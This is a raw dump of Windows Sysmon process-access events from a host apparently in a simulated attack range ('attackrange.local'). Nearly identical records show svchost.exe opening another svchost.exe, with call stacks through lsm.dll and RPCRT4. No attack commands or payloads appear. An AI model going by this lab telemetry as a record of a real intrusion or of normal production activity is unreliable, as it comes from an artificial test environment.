13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.586{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.586{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 